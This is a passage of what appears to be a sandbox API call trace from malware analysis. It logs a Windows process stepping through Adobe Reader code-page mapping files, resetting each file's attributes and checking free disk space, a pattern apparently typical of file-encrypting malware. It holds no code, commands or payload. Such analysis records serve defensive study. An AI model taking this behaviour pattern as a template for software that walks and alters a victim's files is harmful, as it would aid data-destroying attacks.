lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0112.263] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\zdingbat.txt", dwFileAttributes=0x80) returned 1 [0112.266] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0112.266] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0112.267] CoTaskMemFree (pv=0x508980) [0112.267] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0112.270] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0112.276] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\ARABIC.TXT", dwFileAttributes=0x80) returned 1 [0112.279] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0112.283] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\CENTEURO.TXT", dwFileAttributes=0x80) returned 1 [0112.286] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0112.307] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\CHINSIMP.TXT", dwFileAttributes=0x80) returned 1 [0112.311] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0112.345] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\CHINTRAD.TXT", dwFileAttributes=0x80) returned 1 [0112.350] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0112.355] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\CORPCHAR.TXT", dwFileAttributes=0x80) returned 1 [0112.357] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0112.362] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\CROATIAN.TXT", dwFileAttributes=0x80) returned 1 [0112.366] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0112.371] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\CYRILLIC.TXT", dwFileAttributes=0x80) returned 1 [0112.374] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0112.380] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\FARSI.TXT", dwFileAttributes=0x80) returned 1 [0112.382] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0112.387] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\GREEK.TXT", dwFileAttributes=0x80) returned 1 [0112.389] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0112.395] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\HEBREW.TXT", dwFileAttributes=0x80) returned 1 [0112.398] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0112.406] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\ICELAND.TXT", dwFileAttributes=0x80) returned 1 [0112.409] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0112.428] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\JAPANESE.TXT", dwFileAttributes=0x80) returned 1 [0112.434] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0112.472] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\KOREAN.TXT", dwFileAttributes=0x80) returned 1 [0112.477] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0112.483] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\ROMAN.TXT", dwFileAttributes=0x80) returned 1 [0112.485] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0112.492] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\ROMANIAN.TXT", dwFileAttributes=0x80) returned 1 [0112.495] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0112.499] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\SYMBOL.TXT", dwFileAttributes=0x80) returned 1 [0112.502] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0112.507] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\THAI.TXT", dwFileAttributes=0x80) returned 1 [0112.510] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0112.516] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\TURKISH.TXT", dwFileAttributes=0x80) returned 1 [0112.518] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0112.522] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\UKRAINE.TXT", dwFileAttributes=0x80) returned 1 [0112.524] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0112.525] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0112.525] CoTaskMemFree (pv=0x508980) [0112.525] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0112.528] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0112.535] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1250.TXT", dwFileAttributes=0x80) returned 1 [0112.537] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0112.542] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1251.TXT", dwFileAttributes=0x80) returned 1 [0112.544] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0112.548] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1252.TXT", dwFileAttributes=0x80) returned 1 [0112.550] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0112.554] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1253.TXT", dwFileAttributes=0x80) returned 1 [0112.557] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0112.561] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1254.TXT", dwFileAttributes=0x80) returned 1 [0112.564] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0112.567] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1255.TXT", dwFileAttributes=0x80) returned 1 [0112.570] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0112.573] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1256.TXT", dwFileAttributes=0x80) returned 1 [0112.576] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0112.580] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1257.TXT", dwFileAttributes=0x80) returned 1 [0112.582] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0112.586] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1258.TXT", dwFileAttributes=0x80) returned 1 [0112.589] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0112.592] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP874.TXT", dwFileAttributes=0x80) returned 1 [0112.595] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0112.628] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP932.TXT", dwFileAttributes=0x80) returned 1 [0112.633] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0112.734] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP936.TXT", dwFileAttributes=0x80) returned 1 [0112.743] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0112.828] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP949.TXT", dwFileAttributes=0x80) returned 1 [0112.836] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0112.891] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP950.TXT", dwFileAttributes=0x80) returned 1 [0112.897] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0112.897] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0112.897] CoTaskMemFree (pv=0x508980) [0112.897] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0112.897] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0112.897] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0112.897] CoTaskMemFree (pv=0x508980) [0112.897] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0112.902] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0112.902] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0112.903] CoTaskMemFree (pv=0x508980) [0112.903] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0112.903] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0112.903] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0112.903] CoTaskMemFree (pv=0x508980) [0112.903] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0112.904] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0112.904] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0112.904] CoTaskMemFree (pv=0x508980) [0112.904] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0112.904] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0112.904] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0112.904] CoTaskMemFree (pv=0x508980) [0112.904] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0112.913] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0112.913] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0112.913] CoTaskMemFree (pv=0x508980) [0112.913] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0112.913] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0112.913] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0112.913] CoTaskMemFree (pv=0x508980) [0112.913] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0112.914] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0112.914] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0112.914] CoTaskMemFree (pv=0x508980) [0112.914] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0112.918] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0112.918] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0112.918] CoTaskMemFree (pv=0x508980) [0112.919] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0112.920] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0112.920] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0112.920] CoTaskMemFree (pv=0x508980) [0112.920] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0112.924] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0112.924] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0112.924] CoTaskMemFree (pv=0x508980) [0112.924] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0112.925] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0112.925] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0112.925] CoTaskMemFree (pv=0x508980) [0112.925] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0112.926] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0112.926] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0112.926] CoTaskMemFree (pv=0x508980) [0112.926] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0112.927] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0112.927] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0112.927] CoTaskMemFree (pv=0x508980) [0112.927] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0112.928] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0112.928] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0112.928] CoTaskMemFree (pv=0x508980) [0112.928] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0112.928] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0112.928] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0112.929] CoTaskMemFree (pv=0x508980) [0112.929] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0112.929] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0112.929] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0112.930] CoTaskMemFree (pv=0x508980) [0112.930] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0112.931] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0112.931] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0112.931] CoTaskMemFree (pv=0x508980) [0112.931] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0112.931] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0112.931] GetSystemDirectoryW (in: lpBuffer=0x508980, 